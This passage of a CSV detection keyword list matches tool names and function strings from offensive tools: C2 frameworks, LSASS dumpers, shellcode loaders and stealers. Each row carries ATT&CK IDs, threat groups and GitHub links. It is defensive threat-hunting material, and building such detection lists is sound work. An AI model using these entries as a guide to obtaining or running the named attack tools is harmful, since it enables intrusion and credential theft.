TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63051" "*wpscan --url 
*",".{0,1000}wpscan\s\-\-url\s.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","0","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","63052" "*wpscanteam/tap/wpscan*",".{0,1000}wpscanteam\/tap\/wpscan.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","1","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","63053" "*wpscanteam/wpscan*",".{0,1000}wpscanteam\/wpscan.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","1","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","63054" "*Wr173F0rF113(*",".{0,1000}Wr173F0rF113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63055" "*Wra7h/SingleDose*",".{0,1000}Wra7h\/SingleDose.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","63056" 
"*wraith-labs/wraith*",".{0,1000}wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","63057" "*wrap_execute_assembly*",".{0,1000}wrap_execute_assembly.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63058" "*wrap_execute_encoded_powershell*",".{0,1000}wrap_execute_encoded_powershell.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63059" "*wrap_get_clipboard*",".{0,1000}wrap_get_clipboard.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63060" 
"*wrap_inject_shellc*",".{0,1000}wrap_inject_shellc.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63061" "*wrap_load_memfd*",".{0,1000}wrap_load_memfd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63062" "*wrap_unhook_ntdll*",".{0,1000}wrap_unhook_ntdll.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63063" "*Write Dll buffer into remote memory*",".{0,1000}Write\sDll\sbuffer\sinto\sremote\smemory.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","63064" 
"*write_cs_teamserver*",".{0,1000}write_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","63067" "*write_payload_dll_transacted*",".{0,1000}write_payload_dll_transacted.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","63068" "*write_what_where.py*",".{0,1000}write_what_where\.py.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","N/A","3","241","85","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z","63069" "*WriteAndExecuteShellcode*",".{0,1000}WriteAndExecuteShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","63070" "*Write-CMDServiceBinary*",".{0,1000}Write\-CMDServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63071" "*WriteDLLPermission.txt*",".{0,1000}WriteDLLPermission\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","63072" 
"*writefile_bcpxpcmdshell.sql*",".{0,1000}writefile_bcpxpcmdshell\.sql.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","63073" "*Write-HijackDll -OutputFile*",".{0,1000}Write\-HijackDll\s\-OutputFile.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","63074" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63075" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63076" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 
T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","63077" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","63078" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","63079" "*Write-Host ('Hel'+'lo Wo'+'rld!')*",".{0,1000}Write\-Host\s\(\'Hel\'\+\'lo\sWo\'\+\'rld!\'\).{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","63080" "*Write-Host -ForegroundColor Yellow ""IPPrint C2 Server""*",".{0,1000}Write\-Host\s\-ForegroundColor\sYellow\s\""IPPrint\sC2\sServer\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","63081" "*Write-Nessus-Finding*",".{0,1000}Write\-Nessus\-Finding.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - 
TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","63083" "*Write-Nessus-Footer*",".{0,1000}Write\-Nessus\-Footer.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","63084" "*Write-Nessus-Header*",".{0,1000}Write\-Nessus\-Header.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","63085" "*Write-Output 127.0.0.1:1111*",".{0,1000}Write\-Output\s127\.0\.0\.1\:1111.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","63086" "*WritePayloadDll(LPWSTR pwszDllPath)*",".{0,1000}WritePayloadDll\(LPWSTR\spwszDllPath\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","63087" "*WritePayloadDllTransacted*",".{0,1000}WritePayloadDllTransacted.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the 
key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","63088" "*Write-PortscanOut*",".{0,1000}Write\-PortscanOut.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","63089" "*Write-PrivescCheckAsciiReport*",".{0,1000}Write\-PrivescCheckAsciiReport.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","63090" 